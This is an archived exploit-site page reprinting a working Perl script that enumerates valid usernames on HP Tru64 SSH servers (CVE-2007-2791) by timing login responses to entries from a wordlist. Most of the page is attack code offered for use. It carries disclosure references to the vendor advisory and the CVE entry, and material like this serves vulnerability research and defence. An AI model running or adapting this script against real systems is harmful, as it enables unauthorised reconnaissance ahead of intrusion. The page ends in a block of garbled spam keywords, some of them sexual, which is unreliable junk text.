about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , HP Tru64 Remote Secure Shell User Enumeration Exploit (CVE-2007-2791)




2007-06-04 HP Tru64 Remote Secure Shell User Enumeration Exploit (CVE-2007-2791) 
Rated as : High Risk

# tru64-sshenum.pl
# HP Tru64 Remote Secure Shell user enumeration exploit (CVE-2007-2791).
#
# Author: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# The following supported software versions are affected:
#
#  HP Tru64 UNIX v5.1B-4
#  HP Tru64 UNIX v5.1B-3
# 
# The Hewlett-Packard Company thanks Andrea Purificato for reporting this

# vulnerability to security-alert@hp.com
#
# References: 
#  -
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c01007552
#  - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2791
#  - http://rawlab.mindcreations.com/codes/exp/nix/tru64-sshenum.pl
#

my $verbose = undef;
my $port    = 22;
my $timeout = 10;

print <<BANNER;
$0 - HP Tru64 Remote Secure Shell user enumeration exploit

 Andrea "bunker" Purificato - http://rawlab.mindcreations.com
 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2 

BANNER

print "Usage: $0 <target> <userlist>n" and exit(-1)
if ($#ARGV<1);

my $target   = $ARGV[0];
my $wordlist = $ARGV[1];
chomp (my $ssh  = `which ssh`);
chomp (my $tel  = `which telnet`);
my %htimes; my @atimes;

print "[+] Grabbing banner...n";
my $exp = Expect->spawn("$tel -l fake $target $port") 
	or die "Cannot spawn $tel: $!n";;
#$exp->log_stdout(0);
$exp->expect(5,['SSH|ssh'=>sub{$exp->send(".n")}]);
$exp->close();
print "[+] Done!nn";

sub timing {
    my $user = shift @_;
    my $t0 = gettimeofday;
    my $t1 = undef;
    my $exp = Expect->spawn("$ssh -l $user -p $port $target")

	or die "Cannot spawn $ssh: $!n";;
    $exp->log_stdout(0);
   
$exp->expect($timeout,['assword:'=>sub{$exp->send(".n")}]);
    $exp->expect(undef,   [
qr'assword|denied'=>sub{$t1=gettimeofday}]);
    $t1 = gettimeofday unless ($t1);
    $exp->close();
    return sprintf "%0.3f", ($t1-$t0);
}

tie my @wlst_ln, 'Tie::File', "$wordlist", mode=>O_RDONLY
    or die "$wordlist: $!";

print "[+] Started, please wait: ";
for (@wlst_ln) {
    print "($_ dup?)" if ($htimes{$_});
    my $ret = timing($_);
    $htimes{$_} = $ret unless ($htimes{$_});
    push @atimes, $ret;
    unless ($verbose) { print "." }
    else { print "$_tt$retn" }
}
print " Done!nn";

# 
# Do whatever you want with time values:
# 
# (sorted by values)
# 
foreach my $key (sort {$htimes{$b}<=>$htimes{$a}} keys %htimes) {
     print "$key:tt$htimes{$key}n";
}
exit(0);


securitydot.net - 2007-06-04

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 01:58:40 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ako evergreen- Vulnerabil Porn film sinhala+ac BOOB asp Smart Indians se vBulletin www.trish girls hump AISHWARYA guest.html BXCP www.bearww IIPM edu i maui 2.6. kerne key no-650 vidiya son tamil acct Www.chenna JaSmeen Trisha sex www.56sina Crack Data Babes24h.c RSS\r\n 1357242630 six.com free sexy Www.89 sex lo870l Sonal sehg Bobs holiw sexy wallp Bali sex.c sex pictr WWW.oxpass www.livese xj304.cn Anarkali a Www.Women www pinkwo Bangla.Xxx //// 68587114.c zhanshengw Www.Women www.0317i.